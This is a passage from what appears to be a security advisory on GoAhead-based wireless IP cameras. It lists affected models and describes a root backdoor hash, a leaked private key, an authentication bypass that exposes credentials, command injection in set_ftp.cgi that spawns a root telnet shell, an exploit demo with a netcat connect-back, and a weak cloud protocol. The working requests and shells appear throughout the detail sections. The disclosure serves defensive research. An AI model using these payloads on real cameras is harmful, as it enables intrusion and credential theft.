3815-W\r\nTenvis 3815W\r\nTenvis 3815W.\r\nTenvis 3815W2013\r\nTenvis IP-319W\r\nTenvis IP-319w\r\nTenvis IP-391W\r\nTenvis IP-391WHD\r\nTenvis IP-602W\r\nTenvis IP602W\r\nTenvis IPROBOT\r\nTenvis JP-3815W\r\nTenvis JPT-3814WP2P\r\nTenvis JPT-3815\r\nTenvis JPT-3815-P2P\r\nTenvis JPT-3815W\r\nTenvis JPT-3815W+\r\nTenvis JPT-3815WP2P\r\nTenvis JPT-3815w\r\nTenvis JPT-3818\r\nTenvis MINI-319W\r\nTenvis Mini-319\r\nTenvis Other\r\nTenvis PT-7131W\r\nTenvis TH-661\r\nTenvis TR-3818\r\nTenvis TR-3828\r\nTenvis TR3815W\r\nTenvis TZ100\r\nTenvis TZ100/IPROBOT3\r\nTenvus JPG3815W\r\nThreeboy IP-660\r\nTopcam SL-30IPC01Z\r\nTopcam SL-720IPC02Z\r\nTopcam SL-910IW30\r\nTopica+CCTV Other\r\nTrivision NC-335PW-HD-10\r\nTrust NW-7500\r\nTurbo+X Endurance\r\nTurbo+X IIPC-20\r\nUokoo 720P\r\nVCatch Other\r\nVCatch VC-MIC720HK\r\nValtronics IP\r\nValtronics Other\r\nVandesc IP900\r\nVantech Other\r\nVantech PTZ\r\nVideosec+Security IPC-103\r\nVideosec+Security IPP-105\r\nVimicro Other\r\nVitek+CCTV Other\r\nVstarcam 7823\r\nVstarcam C-7824WIP\r\nVstarcam C-7833WIP-X4\r\nVstarcam C-7833wip\r\nVstarcam C-7837WIP\r\nVstarcam C-7838WIP\r\nVstarcam C50S\r\nVstarcam C7816W\r\nVstarcam C7824WIP\r\nVstarcam C782WIP\r\nVstarcam C7842WIP\r\nVstarcam C93\r\nVstarcam C=7824WIP\r\nVstarcam Cam360\r\nVstarcam F-6836W\r\nVstarcam H-6837WI\r\nVstarcam H-6837WIP\r\nVstarcam H-6850\r\nVstarcam H-6850WIP\r\nVstarcam H-6850wip\r\nVstarcam ICAM-608\r\nVstarcam Other\r\nVstarcam T-6835WIP\r\nVstarcam T-6836WTP\r\nVstarcam T-6892wp\r\nVstarcam T-7815WIP\r\nVstarcam T-7833WIP\r\nVstarcam T-7833wip\r\nVstarcam T-7837WIP\r\nVstarcam T-7838WIP\r\nVstarcam T-7892WIP\r\nVstarcam T6836WTP\r\nVstarcam T7837WIP\r\nVstarcam c7815wip\r\nVstarcam c7833wip\r\nVstarcam c7850wip\r\nWanscam 00D6FB01980F\r\nWanscam 106B\r\nWanscam 118\r\nWanscam 541-W\r\nWanscam 543-W\r\nWanscam 790\r\nWanscam AJ-C0WA-198\r\nWanscam AJ-C0WA-B106\r\nWanscam AJ-C0WA-B116\r\nWanscam AJ-C0WA-B168\r\nWanscam AJ-C0WA-B1D8\r\nWanscam AJ-C0WA-C0D8\r\nWanscam AJ-C0WA-C116\r\nWanscam AJ-C0WA-C126\r\nWanscam AJ-C2WA-B118\r\nWanscam AJ-C2WA-C116\r\nWanscam AJ-C2WA-C118\r\nWanscam AJ-C2WA-C198\r\nWanscam AJ-COWA-B1D8\r\nWanscam AJ-COWA-C116\r\nWanscam AJ-COWA-C126\r\nWanscam AJ-COWA-C128\r\nWanscam AW00004J\r\nWanscam B1D8-1\r\nWanscam C-118\r\nWanscam C-126\r\nWanscam Colour\r\nWanscam FI-18904w\r\nWanscam FR-4020A2\r\nWanscam FR4020A2\r\nWanscam HD-100W\r\nWanscam HW-0021\r\nWanscam HW-0022\r\nWanscam HW-0022HD\r\nWanscam HW-0023\r\nWanscam HW-0024\r\nWanscam HW-0025\r\nWanscam HW-0026\r\nWanscam HW-0028\r\nWanscam HW-0033\r\nWanscam HW-0036\r\nWanscam HW-0038\r\nWanscam HW-0039\r\nWanscam HW-22\r\nWanscam HW0030\r\nWanscam IP\r\nWanscam JW-0001\r\nWanscam JW-0003\r\nWanscam JW-0004\r\nWanscam JW-0004m\r\nWanscam JW-0005\r\nWanscam JW-0006\r\nWanscam JW-0008\r\nWanscam JW-0009\r\nWanscam JW-0010\r\nWanscam JW-0011\r\nWanscam JW-0011l\r\nWanscam JW-0012\r\nWanscam JW-0018\r\nWanscam JW-004\r\nWanscam JW-009\r\nWanscam JW-CD\r\nWanscam JW000008\r\nWanscam JW0009\r\nWanscam JW001\r\nWanscam JW0012\r\nWanscam JW008\r\nWanscam JWEV\r\nWanscam JWEV-011777-NSRVV\r\nWanscam JWEV-011921-RXSXT\r\nWanscam JWEV-360171-BBEAC\r\nWanscam JWEV-380096-CECDB\r\nWanscam JWEV-PEPLOW\r\nWanscam NBC-543W\r\nWanscam NC-530\r\nWanscam NC-541\r\nWanscam NC-541/W\r\nWanscam NC-541W\r\nWanscam NC-541w\r\nWanscam NC-543W\r\nWanscam NCB-534W\r\nWanscam NCB-540W\r\nWanscam NCB-541W\r\nWanscam NCB-541WB\r\nWanscam NCB-543W\r\nWanscam NCBL-618W\r\nWanscam NCH-532MW\r\nWanscam NCL-610W\r\nWanscam NCL-612W\r\nWanscam NCL-616W\r\nWanscam NCL-S616W\r\nWanscam Other\r\nWanscam TG-002\r\nWanscam WJ-0004\r\nWanscam WX-617\r\nWanscam Works\r\nWanscam XHA-120903181\r\nWanscam XHA-4020a2\r\nWanscam __PTZ\r\nWanscam chiOthernese\r\nWanscam ip\r\nWanscam jw0005\r\nWanscam jw0010\r\nWansview 541\r\nWansview 625W\r\nWansview MCM-627\r\nWansview N540w\r\nWansview NCB-534W\r\nWansview NCB-541W\r\nWansview NCB-541w\r\nWansview NCB-543W\r\nWansview NCB541W\r\nWansview NCB545W\r\nWansview NCL-610W\r\nWansview NCL610D04\r\nWansview NCL614W\r\nWansview Other\r\nWansview dcs543w\r\nWansview nc543w\r\nWardmay+CCTV WDM-6702AL\r\nWatch+bot+Camera resup\r\nWebcamXP Other\r\nWinBook Other\r\nWinBook T-6835\r\nWinBook T-6835WIP\r\nWinBook T-7838\r\nWinic NVT-530004\r\nWise+Group Other\r\nX-Price Other\r\nX10 39A\r\nX10 AIRSIGHT\r\nX10 AirSight\r\nX10 Airsight\r\nX10 Jake\r\nX10 Other\r\nX10 XC-38A\r\nX10 XX-36A\r\nX10 XX-39A\r\nX10 XX-56A\r\nX10 XX-59A\r\nX10 XX-60\r\nX10 XX-69A\r\nX10 XX41Ahome\r\nXVision Other\r\nXXCamera 53100\r\nXXCamera 5330-E\r\nXXCamera Other\r\nXXCamera XXC-000723-NJFJD\r\nXXCamera XXC-092411-DCAFC\r\nXXCamera XXC-50100-H\r\nXXCamera XXC-50100-T\r\nXXCamera XXC-5030-E\r\nXXCamera XXC-53100-T\r\nXXCamera XXC52130\r\nXin+Ling Other\r\nYawcam Other\r\nZilink Other\r\nZmodo CMI-11123BK\r\nZmodo IP-900\r\nZmodo Other\r\nZodiac+Security 909\r\nZodiac+Security Other\r\nZoneway NC638MW-P\r\nZyXEL Other\r\nalexim Other\r\nalexim cam22822\r\nalias Other\r\nall+in+one+ Other\r\nall+in+one+ b1\r\nall-in-one Other\r\nallecto DVC-150IP\r\napc Other\r\nasw-006 Other\r\nboh l\r\nbravo Other\r\nbush+plus BU-300WF\r\nccam p2p\r\nchina 8904W\r\nchina HDIPCAM\r\nchina IPCAM\r\nchina Other\r\nchina PTZCAM\r\nchina np-02\r\nciana+exports antani\r\ncina Other\r\ncoolead L\r\ncoolead L610WS\r\ndax Other\r\ndenver IPC-320\r\ndenver IPO-320\r\ne-landing 720p\r\neScam QF100\r\nebw Other\r\nepexis PIPCAMHD82\r\nepexis pipcam5\r\nesecure nvp\r\ngeeya C602\r\ngeeya P2P\r\ngeeya c801\r\nhdcam Other\r\nhomeguard 720P\r\nhomeguard Other\r\nhomeguard Wireless\r\nhomeguard wifi\r\niView ID002A\r\niView Other\r\ninsteon 75790\r\ninsteon 75790wh\r\ninsteon High\r\ninsteon Other\r\ninsteon Wireless\r\niuk 5A1\r\nivision hdwificam\r\niwitness bullet\r\njwt Other\r\njyacam JYA8010\r\nkadymay KDM-6800\r\nkadymay KDM6702\r\nkadymay KMD-6800\r\nkadymay Other\r\nkang+xun xxc5030-t\r\nkines Other\r\nkiocong 1601\r\nkiocong 1602\r\nkiocong 1609\r\nkiocong Other\r\nkodak 201pl\r\nkoicong 1601\r\nl+series CAM0758\r\nl+series CAM0760\r\nl+series Other\r\nl+series V100\r\nlogan n8504hh\r\nmeyetech 095475-caeca\r\nmeyetech 188091-EFBAE\r\nmeyetech Other\r\nmeyetech WirelessCam\r\nmicasaverde VistaCamSD\r\npipcam HD17\r\npni 941w\r\npni IP451W\r\npni IP541W\r\npni IP941W\r\npni IP951W\r\npni Other\r\npnp IP\r\npnp Other\r\nsemac Other\r\nskylink WC-300PS\r\nstorex D-10H\r\n\r\n```\r\n\r\n[Shodan lists 185 000 vulnerable cameras](https://www.shodan.io/search?query=GoAhead+5ccc069c403ebaf9f0171e9517f40e41).\r\n\r\n<a id=\"backdoor-account\"></a>\r\n\r\n## Details - Backdoor account\r\n\r\nBy default, telnetd is running on the camera.\r\n\r\n```\r\nuser@kali$ telnet 192.168.1.107\r\nTrying 192.168.1.107...\r\nConnected to 192.168.1.107.\r\nEscape character is '^]'.\r\n\r\napk-link login: admin\r\nPassword:\r\n\r\ntelnet> q\r\nConnection closed.\r\nuser@kali$\r\n\r\n```\r\n\r\nOne backdoor account exists in the camera:\r\n\r\n```\r\nroot:$1$ybdHbPDn$ii9aEIFNiolBbM9QxW9mr0:0:0::/root:/bin/sh\r\n\r\n```\r\n\r\n\r\n\r\n## Details - RSA key and certificates\r\n\r\nThe `/system/www/pem/ck.pem` contains an Apple certificate with a private RSA key:\r\n\r\n```\r\n/ # cat /system/www/pem/ck.pem \r\nBag Attributes\r\n friendlyName: Apple Production IOS Push Services: com.app.camera\r\n localKeyID: 74 9E 29 D0 6A 47 1B 35 AD D4 68 6D 46 D8 E2 37 C8 DA A1 9D \r\nsubject=/UID=com.app.camera/CN=Apple Production IOS Push Services: com.app.camera/OU=SQ6NNPBE2K/C=US\r\nissuer=/C=US/O=Apple Inc./OU=Apple Worldwide Developer Relations/CN=Apple Worldwide Developer Relations Certification Authority\r\n-----BEGIN CERTIFICATE-----\r\n[...]\r\n-----END CERTIFICATE-----\r\nBag Attributes\r\n friendlyName: andrew\r\n localKeyID: 74 9E 29 D0 6A 47 1B 35 AD D4 68 6D 46 D8 E2 37 C8 DA A1 9D \r\nKey Attributes: <No Attributes>\r\n-----BEGIN RSA PRIVATE KEY-----\r\n[...]\r\n-----END RSA PRIVATE KEY-----\r\n\r\n```\r\n\r\n<a id=\"pre-auth-info-leak-goahead\"></a>\r\n\r\n## Details - Pre-Auth Info Leak (credentials) within the GoAhead http server\r\n\r\nThe HTTP interface is provided by GoAhead. It allows 2 kinds of authentication:\r\n\r\n* htdigest authentication OR\r\n* authentication using credentials in URI (`?loginuse=LOGIN&?loginpas=PASS`).\r\n\r\nBy default, the web directory contains symbolic links to configuration files (`system.ini` and `system-b.ini` contain credentials):\r\n\r\n```\r\n/tmp/web # ls -la *ini\r\nlrwxrwxrwx 1 root 0 25 Oct 27 02:11 factory.ini -> /system/param/factory.ini\r\nlrwxrwxrwx 1 root 0 30 Oct 27 02:11 factoryparam.ini -> /system/param/factoryparam.ini\r\nlrwxrwxrwx 1 root 0 23 Oct 27 02:11 network-b.ini -> /system/www/network.ini\r\nlrwxrwxrwx 1 root 0 23 Oct 27 02:11 network.ini -> /system/www/network.ini\r\nlrwxrwxrwx 1 root 0 22 Oct 27 02:11 system-b.ini -> /system/www/system.ini\r\nlrwxrwxrwx 1 root 0 22 Oct 27 02:11 system.ini -> /system/www/system.ini\r\n/tmp/web #\r\n\r\n```\r\n\r\nWith valid credentials, an attacker can retrieve the configuration, as shown below:\r\n\r\n```\r\nuser@kali$ wget -qO- 'http://admin:admin@192.168.1.107/system.ini'|xxd\r\n\r\n[...]\r\n000001d0: ffff ffff ffff ffff ffff ffff ffff ffff ................\r\n000001e0: ffff ffff ffff ffff ffff ffff ffff ffff ................\r\n000001f0: ffff ffff ffff ffff ffff ffff ffff ffff ................\r\n00000200: ffff ffff ffff ffff ffff ffff ffff ffff ................\r\n00000210: ffff ffff ffff ffff ffff ffff 7b6f 1158 ............{o.X\r\n00000220: 0000 0000 0100 0000 7469 6d65 2e6e 6973 ........time.nis\r\n00000230: 742e 676f 7600 0000 0000 0000 0000 0000 t.gov...........\r\n00000240: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000250: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000260: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000270: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000280: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000290: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000002a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000002b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000002c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n[...]\r\n00000640: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000650: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000660: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000670: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000680: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n000006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n000006c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000006d0: 030a 0a0f 8000 0000 0101 0003 0002 0000 ................\r\n[...]\r\nuser@kali$\r\n\r\n```\r\n\r\nTo browse `.cgi` files, an attacker needs to authenticate too:\r\n\r\n```\r\nuser@kali$ wget -qO- 'http://192.168.1.107/get_params.cgi?loginuse=BAD_LOGIN&loginpas=BAD_PASS'\r\nvar result=\"Auth Failed\";\r\nuser@kali$ wget -qO- 'http://192.168.1.107/get_params.cgi?loginuse&loginpas'\r\nvar result=\"Auth Failed\";\r\n\r\n```\r\n\r\nBut it appears access to `.ini` files are not correctly checked. The attacker can bypass the authentication by providing an empty `loginuse` and an empty `loginpas` in the URI:\r\n\r\n```\r\nuser@kali$ wget -qO- 'http://192.168.1.107/system.ini?loginuse&loginpas'|xxd|less\r\n00000000: 5749 4649 4341 4d00 0000 0000 0000 0000 WIFICAM.........\r\n00000010: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000020: 0000 0100 0000 0000 0000 0000 0000 0000 ................\r\n[...]\r\n00000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n000006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n[...]\r\n\r\n```\r\n\r\nA PoC is provided:\r\n\r\n```\r\n./expl 192.168.1.107 --get-config | xxd | grep 000003\r\n\r\n00000030: 6d53 6563 0a0a 5b2b 5d20 6279 7061 7373 mSec..[+] bypass\r\n00000300: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000310: 0000 0000 0000 0000 0000 0000 0a0a 0a0a ................\r\n00000320: 0100 0000 0a03 0100 0000 0000 0000 0000 ................\r\n00000330: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000340: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000350: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000360: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000370: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000380: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000390: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000003a0: 0000 0000 0000 0000 0000 6164 6d69 6e00 ..........admin.\r\n000003b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000003c0: 0000 0000 0000 0000 0000 6164 6d69 6e00 ..........admin.\r\n000003d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000003e0: 0000 0000 0000 0000 0000 030a 0a0f 8000 ................\r\n000003f0: 0000 0101 0003 0002 0000 0080 8080 8001 ................\r\n\r\n```\r\n\r\nThis vulnerability allows an attacker to steal credentials, ftp accounts and smtp accounts (email).\r\n\r\n<a id=\"root-rce\"></a>\r\n\r\n## Details - Authenticated RCE as root\r\n\r\nA RCE exists in the ftp configuration CGI. This is well-documented as shown [here](https://jumpespjump.blogspot.de/2015/09/how-i-hacked-my-ip-camera-and-found.html) and [here](https://www.pentestpartners.com/blog/hacking-the-aldi-ip-cctv-camera-part-2/) in several different camera models.\r\n\r\nThe partition `/` is mounted in Read-Only, so modifications are not possible in this partition.\r\n\r\nThe command injection is located in in `set_ftp.cgi` (see `$(ftp x.com)`):\r\n\r\n```\r\nhttp://192.168.1.107/set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin&svr=192.168.1.1&port=21&user=ftp&pwd=$(ftp x.com)ftp&dir=/&mode=PORT&upload_interval=0\r\nhttp://192.168.1.107/ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=admin\r\n\r\n```\r\n\r\nWhen doing a tcpdump, we can see the DNS resolution for x.com:\r\n\r\n```\r\n00:00:00.151107 IP 192.168.1.107.33551 > 8.8.8.8.53: 40888+ A? x.com. (23)\r\n\r\n```\r\n\r\nso, `ftp x.com` is executed.\r\n\r\nWe can use the telnetd binary to start an authenticated-less telnetd access:\r\n\r\n```\r\nuser@kali$ wget -qO- 'http://192.168.1.107/set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin&svr=192.168.1.1&port=21&user=ftp&pwd=$(telnetd -p25 -l/bin/sh)&dir=/&mode=PORT&upload_interval=0'\r\nuser@kali$ wget -qO- 'http://192.168.1.107/ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=admin'\r\n\r\n```\r\n\r\nTesting this will give us root account on port 25/tcp:\r\n\r\n```\r\nuser@kali$ telnet 192.168.1.107 25\r\nTrying 192.168.1.107...\r\nConnected to 192.168.1.107.\r\nEscape character is '^]'.\r\n\r\n/ # id\r\nuid=0(root) gid=0\r\n/ # uname -ap\r\nLinux apk-link 3.10.14 #5 PREEMPT Thu Sep 22 09:11:41 CST 2016 mips GNU/Linux\r\n/ # mount\r\nrootfs on / type rootfs (rw)\r\n/dev/root on / type squashfs (ro,relatime)\r\n/proc on /proc type proc (rw,relatime)\r\nsysfs on /sys type sysfs (rw,relatime)\r\ntmpfs on /dev type tmpfs (rw,relatime,size=2048k)\r\ntmpfs on /tmp type tmpfs (rw,relatime,size=5120k)\r\ndevpts on /dev/pts type devpts (rw,relatime,mode=600,ptmxmode=000)\r\n/dev/mtdblock3 on /system type jffs2 (rw,relatime)\r\n/ #\r\n\r\n```\r\n\r\n`/etc` is in read-only. So, command injection must not write into `/etc`. The injection is located in `/tmp/ftpupload.sh`:\r\n\r\n```\r\n/ # cat /tmp/ftpupload.sh \r\n/bin/ftp -n<<!\r\nopen 192.168.1.1 21\r\nuser ftp $(telnetd -l /bin/sh -p 25)ftp\r\nbinary\r\nlcd /tmp\r\nput ftptest.txt\r\nclose\r\nbye\r\n!\r\n/ #\r\n\r\n```\r\n\r\n<a id=\"pre-auth-root-rce\"></a>\r\n\r\n## Details - Pre-Auth RCE as root\r\n\r\nBy combining the Pre-Auth Info Leak within the GoAhead http server vulnerability and then authenticated RCE as root, an attacker can achieve a pre-auth RCE as root on a LAN or on the Internet.\r\n\r\nAn exploit is provided and can be used to get a root RCE with connect-back.\r\n\r\nThe exploit will:\r\n\r\n1. extract the valid credentials by connecting to the remote GoAhead HTTP server of the targeted camera\r\n2. plant a connect-back with `nc`\r\n3. execute the payload\r\n4. the attacker will receive a root shell with netcat on a second terminal\r\n5. clean the payload located in the configuration file\r\n\r\nIt affects 1250+ camera models.\r\n\r\nDemo:\r\n\r\n```\r\nuser@kali$ gcc -Wall -o expl expl-goahead-camera.c && ./expl 192.168.1.107 \r\nCamera 0day root RCE with connect-back @PierreKimSec\r\n\r\nPlease run `nc -vlp 1337` on 192.168.1.1\r\n\r\n[+] bypassing auth ... done\r\n login = admin\r\n pass = admin\r\n[+] planting payload ... done\r\n[+] executing payload ... done\r\n[+] cleaning payload ... done\r\n[+] cleaning payload ... done\r\n[+] enjoy your root shell on 192.168.1.1:1337\r\nuser@kali$\r\n\r\n```\r\n\r\nOn the second xterm:\r\n\r\n```\r\nuser@kali$ nc -lvp 1337\r\nlistening on [any] 1337 ...\r\n192.168.1.107: inverse host lookup failed: Unknown host\r\nconnect to [192.168.1.1] from (UNKNOWN) [192.168.1.107] 47968\r\nid\r\nuid=0(root) gid=0\r\nuname -ap\r\nLinux apk-link 3.10.14 #5 PREEMPT Thu Sep 22 09:11:41 CST 2016 mips GNU/Linux\r\nps \r\nPID USER TIME COMMAND\r\n 1 root 0:01 {linuxrc} init\r\n 2 root 0:00 [kthreadd]\r\n 3 root 0:00 [ksoftirqd/0]\r\n 5 root 0:00 [kworker/0:0H]\r\n 6 root 0:00 [kworker/u2:0]\r\n 7 root 0:00 [rcu_preempt]\r\n 8 root 0:00 [rcu_bh]\r\n 9 root 0:00 [rcu_sched]\r\n 10 root 0:00 [watchdog/0]\r\n 11 root 0:00 [khelper]\r\n 12 root 0:00 [writeback]\r\n 13 root 0:00 [bioset]\r\n 14 root 0:00 [kblockd]\r\n 15 root 0:00 [khubd]\r\n 16 root 0:00 [kworker/0:1]\r\n 17 root 0:00 [cfg80211]\r\n 18 root 0:00 [rpciod]\r\n 19 root 0:00 [kswapd0]\r\n 20 root 0:00 [fsnotify_mark]\r\n 21 root 0:00 [nfsiod]\r\n 22 root 0:00 [crypto]\r\n 36 root 0:00 [kworker/u2:1]\r\n 39 root 0:00 [i2s_work_1]\r\n 40 root 0:00 [i2s_codec_irq_w]\r\n 41 root 0:00 [kworker/0:2]\r\n 42 root 0:00 [deferwq]\r\n 43 root 0:00 [kworker/0:1H]\r\n 59 root 0:00 [jffs2_gcd_mtd3]\r\n 61 root 0:00 telnetd\r\n 69 root 0:00 /system/system/bin/wifidaemon\r\n 70 root 0:00 /sbin/getty -L ttyS1 115200 vt100\r\n 98 root 0:01 [RtmpTimerTask]\r\n 99 root 0:00 [RtmpMlmeTask]\r\n 100 root 0:00 [RtmpCmdQTask]\r\n 101 root 0:00 [RtmpWscTask]\r\n 148 root 1:19 /tmp/encoder\r\n 164 root 0:00 [irq/37-isp]\r\n 236 root 0:07 [apical_isp_fw_p]\r\n 2330 root 0:00 sh -c /tmp/ftpupload.sh > /tmp/ftpret.txt\r\n 2331 root 0:00 {exe} ash /tmp/ftpupload.sh\r\n 2332 root 0:00 {exe} ash /tmp/ftpupload.sh\r\n 2333 root 0:00 /bin/ftp -n\r\n 2334 root 0:00 /bin/sh\r\n 2439 root 0:00 ps\r\n\r\n```\r\n\r\nDetails -- Misc - \"Cloud\" (Aka Botnet)\r\nBy default, the camera uses a 'Cloud' functionality.\r\n\r\nYou can tcpdump the traffic of the camera, which is very scary:\r\n```\r\n12:09:21.410947 IP 192.168.1.107.46958 > 8.8.8.8.53: 60806+ A? openapi.xg.qq.com.gateway. (43)\r\n12:09:26.429697 IP 192.168.1.107.58156 > 202.96.134.33.53: 60806+ A? openapi.xg.qq.com.gateway. (43)\r\n12:09:31.450033 IP 192.168.1.107.41499 > 8.8.8.8.53: 28561+ A? www.baidu.com. (31)\r\n12:09:35.128919 IP 192.168.1.107.13179 > 121.42.208.86.32100: UDP, length 48\r\n12:09:35.128932 IP 192.168.1.107.13179 > 54.221.213.97.32100: UDP, length 48\r\n12:09:35.128933 IP 192.168.1.107.13179 > 120.24.37.48.32100: UDP, length 48\r\n12:09:36.468849 IP 192.168.1.107.44185 > 202.96.134.33.53: 28561+ A? www.baidu.com. (31)\r\n12:09:41.488223 IP 192.168.1.107.41499 > 8.8.8.8.53: 28561+ A? www.baidu.com. (31)\r\n12:09:46.507810 IP 192.168.1.107.44185 > 202.96.134.33.53: 28561+ A? www.baidu.com. (31)\r\n12:09:51.527501 IP 192.168.1.107.47793 > 8.8.8.8.53: 33930+ A? www.baidu.com.gateway. (39)\r\n12:09:56.546854 IP 192.168.1.107.53618 > 202.96.134.33.53: 33930+ A? www.baidu.com.gateway. (39)\r\n12:10:01.566316 IP 192.168.1.107.47793 > 8.8.8.8.53: 33930+ A? www.baidu.com.gateway. (39)\r\n12:10:06.575735 ARP, Request who-has 192.168.1.1 tell 192.168.1.107, length 46\r\n12:10:06.575750 ARP, Reply 192.168.1.1 is-at 00:e0:4c:51:55:ed, length 28\r\n12:10:06.585841 IP 192.168.1.107.53618 > 202.96.134.33.53: 33930+ A? www.baidu.com.gateway. (39)\r\n12:10:11.606030 IP 192.168.1.107.46252 > 8.8.8.8.53: 41046+ A? time.nist.gov. (31)\r\n12:10:16.625044 IP 192.168.1.107.44109 > 202.96.134.33.53: 41046+ A? time.nist.gov. (31)\r\n12:10:19.214687 IP 192.168.1.107.13179 > 121.42.208.86.32100: UDP, length 48\r\n12:10:19.214700 IP 192.168.1.107.13179 > 54.221.213.97.32100: UDP, length 48\r\n12:10:19.214702 IP 192.168.1.107.13179 > 120.24.37.48.32100: UDP, length 48\r\n12:10:21.644397 IP 192.168.1.107.46252 > 8.8.8.8.53: 41046+ A? time.nist.gov. (31)\r\n```\r\n\r\nThe camera tries to resolve `www.baidu.com`, `openapi.xg.qq.com`, contacts hardcoded IPs and hosts:\r\n\r\n* `121.42.208.86:32100/udp` (CN: Alibaba),\r\n* `54.221.213.97:32100/udp` (AWS US),\r\n* `120.24.37.48:32100/udp` (CN: Alibaba),\r\n* `www.baidu.com:80/tcp` (CN: Baidu).\r\n\r\nIt appears this is the 'Cloud' functionality, enabled by default. The security of this functionality is not proven.\r\n\r\nThe provided Android application to manage my camera is [object.p2pwificam.client.apk](https://play.google.com/store/apps/details?id=object.p2pwificam.client).\r\n\r\n\r\n\r\n\r\n\r\nNetcam 360 works too:\r\n\r\n\r\n\r\nIt appears, the network protocol is very weak:\r\n\r\n1. the camera contacts a remote server using UDP,\r\n2. the application contacts a remote server using UDP,\r\n3. the application sends a request to the remote server, asking if the camera with the specific serial-number is online,\r\n4. the server will reply by \"camera doesn't exit\", \"camera is offline\" or \"camera is online\",\r\n5. if the camera is online, a UDP tunnel is automaticaly established between the application and the camera, using the Cloud server as a relay.\r\n\r\n### UDP tunnel:\r\n\r\n```\r\n[Android Application] <===UDP===> Cloud server <===UDP===> [Camera]\r\n\r\n```\r\n\r\nThen, the UDP tunnel is used by the application to reach the camera:\r\n\r\n1/ the client will send a HTTP request to the camera with the credentials (still in clear-text)\r\n\r\n```\r\nGET check_user.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&\r\n\r\n```\r\n\r\nor\r\n\r\n```\r\nGET /check_user.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&\r\n\r\n```\r\n\r\n2/ the camera will reply by using HTTP over UDP whenever the credentials are valid or invalid.\r\n\r\nIf the credentials are valid, the camera will reply:\r\n\r\n```\r\nresult= 0;\r\n\r\n```\r\n\r\nIf the credentials are not valid, the camera will reply:\r\n\r\n```\r\nresult=-1\r\n\r\n```\r\n\r\n3/ if the credentials are valid, then the application will send HTTP requests to .cgi files hosted by the camera by appending credentials to the requests (`?loginuse=valid_user&loginpas=valid_pass`)\r\n\r\n### Step 2 in detail:\r\n\r\nIf the authentication is OK, so it is alright to dump all the configuration in cleartext!\r\n\r\n\r\n\r\nNote: this trace was done with one of the application listed below, to be sure applications are sharing the same \"cloud\" network (it appears the daemon running on the camera doesn't strictly respect the HTTP protocol - note the lack of `/` - but it works !).\r\n\r\nIf the authentication is not OK. The cameras answers:\r\n\r\n```\r\nresult=-1;\r\n\r\n```\r\n\r\nDue to the absence of checking, an attacker can simply bruteforce credentials.\r\n\r\n\r\n\r\n### Step 3 in detail:\r\n\r\nThe application sends:\r\n\r\n```\r\nGET get_params.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&\r\n\r\n```\r\n\r\nOR\r\n\r\n```\r\nGET /get_params.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&\r\n\r\n```\r\n\r\nThe camera replies by sending all its configuration in clear-text:\r\n\r\n```\r\nvar now=1122211111;\r\nvar dst_enable=0;\r\nvar dst_time=0;\r\nvar tz=0;\r\nvar ntp_enable=1;\r\nvar ntp_svr=\"time.nist.gov\";\r\nvar dhcpen=1;\r\nvar ip=\"192.168.2.76\";\r\nvar mask=\"255.255.255.0\";\r\nvar gateway=\"192.168.2.1\";\r\nvar dns1=\"8.8.8.8\";\r\nvar dns2=\"192.168.2.1\";\r\nvar port=80;\r\nvar nashost=\"\";\r\nvar nasport=0;\r\nvar dev2_host=\"\";\r\nvar dev2_alias=\"\";\r\nvar dev2_user=\"\";\r\nvar dev2_pwd=\"\";\r\nvar dev2_port=0;\r\nvar dev3_host=\"\";\r\nvar dev3_alias=\"\";\r\nvar dev3_user=\"\";\r\nvar dev3_pwd=\"\";\r\nvar dev3_port=0;\r\nvar dev4_host=\"\";\r\nvar dev4_alias=\"\";\r\nvar dev4_user=\"\";\r\nvar dev4_pwd=\"\";\r\nvar dev4_port=0;\r\nvar dev5_host=\"\";\r\nvar dev5_alias=\"\";\r\nvar dev5_user=\"\";\r\nvar dev5_pwd=\"\";\r\nvar dev5_port=0;\r\nvar dev6_host=\"\";\r\nvar dev6_alias\r\n[...]\r\nvar user1_name=\"\";\r\nvar user1_pwd=\"\";\r\nvar user2_name=\"wut\";\r\nvar 